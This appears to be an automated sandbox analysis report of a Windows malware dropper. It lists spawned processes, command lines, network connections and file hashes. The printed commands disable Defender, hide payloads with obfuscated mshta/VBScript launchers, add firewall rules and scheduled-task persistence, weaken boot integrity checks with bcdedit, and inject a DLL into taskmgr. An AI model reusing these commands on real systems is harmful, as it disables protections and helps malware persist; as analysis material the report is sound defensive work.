PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe

"C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue121e696b2d94fe.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue120ba2d3df.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12b645e6648.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue127d1be88dd70f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12b505de68357.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12536443c2c8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1239d4b60d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1264f7b252.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue129ba086d712.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue125fd9410f80dd6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue127ff3b5477.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue123e8bf9beda40e5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12d6c3a590f5c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue122eaa5d903b51f3.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12f72da5484b.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127d1be88dd70f8.exe

Tue127d1be88dd70f8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe

Tue121e696b2d94fe.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe

Tue1239d4b60d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127ff3b5477.exe

Tue127ff3b5477.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe

Tue129ba086d712.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe

Tue12d6c3a590f5c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b505de68357.exe

Tue12b505de68357.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe

Tue12b645e6648.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe

Tue12f72da5484b.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe

Tue1264f7b252.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe

Tue120ba2d3df.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe

Tue125fd9410f80dd6.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe" -u

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe

Tue12536443c2c8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe

Tue122eaa5d903b51f3.exe /mixtwo

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe

Tue123e8bf9beda40e5.exe

C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp

"C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp" /SL5="$70192,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbSCRIPT: CLoSe ( CreAtEoBject ( "WSCrIPT.sheLL" ). RUn ( "cmD.ExE /q /r TYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe"" > YFBh.exE && staRt YFBH.EXe -pM6ql1llc4LCunhpM & If """" == """" for %h IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe"" ) do taskkill /F -Im ""%~Nxh"" " , 0 , trUe ) )

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp

"C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp" /SL5="$6015E,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe"

C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp

"C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp" /SL5="$70160,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 448 -s 272

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /r TYPe "C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe" > YFBh.exE && staRt YFBH.EXe -pM6ql1llc4LCunhpM & If "" == "" for %h IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe" ) do taskkill /F -Im "%~Nxh"

C:\Users\Admin\AppData\Local\Temp\YFBh.exE

YFBH.EXe -pM6ql1llc4LCunhpM

C:\Windows\SysWOW64\taskkill.exe

taskkill /F -Im "Tue120ba2d3df.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbSCRIPT: CLoSe ( CreAtEoBject ( "WSCrIPT.sheLL" ). RUn ( "cmD.ExE /q /r TYPe ""C:\Users\Admin\AppData\Local\Temp\YFBh.exE"" > YFBh.exE && staRt YFBH.EXe -pM6ql1llc4LCunhpM & If ""-pM6ql1llc4LCunhpM "" == """" for %h IN ( ""C:\Users\Admin\AppData\Local\Temp\YFBh.exE"" ) do taskkill /F -Im ""%~Nxh"" " , 0 , trUe ) )

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /r TYPe "C:\Users\Admin\AppData\Local\Temp\YFBh.exE" > YFBh.exE && staRt YFBH.EXe -pM6ql1llc4LCunhpM & If "-pM6ql1llc4LCunhpM " == "" for %h IN ( "C:\Users\Admin\AppData\Local\Temp\YFBh.exE" ) do taskkill /F -Im "%~Nxh"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241109212805.log C:\Windows\Logs\CBS\CbsPersist_20241109212805.cab

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCrIpT: clOSe ( CreATEObjeCt ( "WsCriPT.sheLL" ). ruN ( "Cmd.exe /q /c Echo | SeT /P = ""MZ"" > ylDS9MD.oZ & CoPy /B /Y YlDS9MD.OZ + 7YBr4YIV.4 + L8jNB.A + Kkyl.Ybx + YHDI9E.EIU + KsN5NH.WJU NKGtN.2& STaRt control .\NKGTN.2 " , 0 , trUe ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /c Echo | SeT /P = "MZ" > ylDS9MD.oZ& CoPy /B /Y YlDS9MD.OZ + 7YBr4YIV.4 + L8jNB.A + Kkyl.Ybx + YHDI9E.EIU + KsN5NH.WJU NKGtN.2& STaRt control .\NKGTN.2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>ylDS9MD.oZ"

C:\Windows\SysWOW64\control.exe

control .\NKGTN.2

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\NKGTN.2

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Program Files (x86)\Gparted\Build.sfx.exe

"C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1

C:\Program Files (x86)\Gparted\Build.exe

"C:\Program Files (x86)\Gparted\Build.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com

C:\Program Files (x86)\Gparted\gimagex.exe

"C:\Program Files (x86)\Gparted\gimagex.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "93478235813389613141469676073-1481490987-849097770-411083071-256084815-1993590202"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /306-306

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-130913910907659240-117405465-1152408639-1249432833413201776-3437839801289592925"

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-3089677442696828811337722847-2117008512-245034745-14781113735556310801475178297"

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\NKGTN.2

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\NKGTN.2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 1668

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network

Country Destination Domain Proto
FR 212.193.30.45:80 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 tweakballs.com udp
US 52.203.72.196:443 www.listincode.com tcp
US 8.8.8.8:53 webdatingcompany.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 buy-fantasy-gxmes.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
US 54.205.158.59:443 www.listincode.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 172.67.74.161:443 iplogger.org tcp
FR 91.121.67.60:51630 tcp
DE 49.12.219.50:4846 tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
DE 49.12.219.50:4846 tcp
NL 185.154.15.4:21735 tcp
DE 49.12.219.50:4846 tcp
FR 212.193.30.29:80 tcp
US 8.8.8.8:53 www.google.com udp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
FR 91.121.67.60:51630 tcp
DE 49.12.219.50:4846 tcp
US 8.8.8.8:53 www.yahoo.com udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
DE 212.192.241.62:80 tcp
NL 185.154.15.4:21735 tcp
US 8.8.8.8:53 trumops.com udp
US 8.8.8.8:53 www.yahoo.com udp
US 8.8.8.8:53 retoti.com udp
US 8.8.8.8:53 logs.trumops.com udp
US 8.8.8.8:53 logs.retoti.com udp
DE 49.12.219.50:4846 tcp
US 8.8.8.8:53 bfdeedc9-3ac6-448e-a6f3-60a0bcb893c2.uuid.trumops.com udp
US 8.8.8.8:53 server10.trumops.com udp
US 44.221.84.105:443 server10.trumops.com tcp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.21:443 bitbucket.org tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
DE 49.12.219.50:4846 tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
DE 49.12.219.50:4846 tcp
FR 91.121.67.60:51630 tcp
DE 49.12.219.50:4846 tcp
NL 185.154.15.4:21735 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
FR 91.121.67.60:51630 tcp
DE 49.12.219.50:4846 tcp
US 72.84.118.132:8080 tcp
DE 49.12.219.50:4846 tcp
NL 185.154.15.4:21735 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
FR 91.121.67.60:51630 tcp
DE 49.12.219.50:4846 tcp
US 72.84.118.132:8080 tcp
DE 49.12.219.50:4846 tcp
NL 185.154.15.4:21735 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
US 8.8.8.8:53 dumancue.com udp
FR 91.121.67.60:51630 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp

Files

\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe

MD5 653f5bbaac95d546bb4c5c7557b25c22
SHA1 346e064735ca5abe0963288dd342d7ea058bb61a
SHA256 d427e3e6fb34458f934fbe1f61ee8a480f84d2d20bf3fcc436e772593d2d5f12
SHA512 1feeab3ade970823abba275110655beac744eb34e59a47c7058bccde0beb699999f627e7b1abbee1f76db6a3e4780781fe3b88c7c798a5639d6b458d35f6a446

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zSC5B35246\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2692-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC5B35246\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2692-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC5B35246\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zSC5B35246\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2692-80-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2692-79-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2692-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2692-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2692-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2692-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2692-75-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2692-74-0x000000006494A000-0x000000006494F000-memory.dmp

memory/2692-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2692-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2692-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2692-69-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe

MD5 4f11e641d16d9590ac1c9f70d215050a
SHA1 75688f56c970cd55876f445c8319d7b91ce556fb
SHA256 efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0
SHA512 b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe

MD5 7b253e0725b69672ef3d44d524de2c4c
SHA1 f3c0d9f5f984ee5d7578eeabded495094cec1031
SHA256 8b6540b22cc0be302f5c1e71de5d436a4036af18a55a0e4f185d0aaec6756d5c
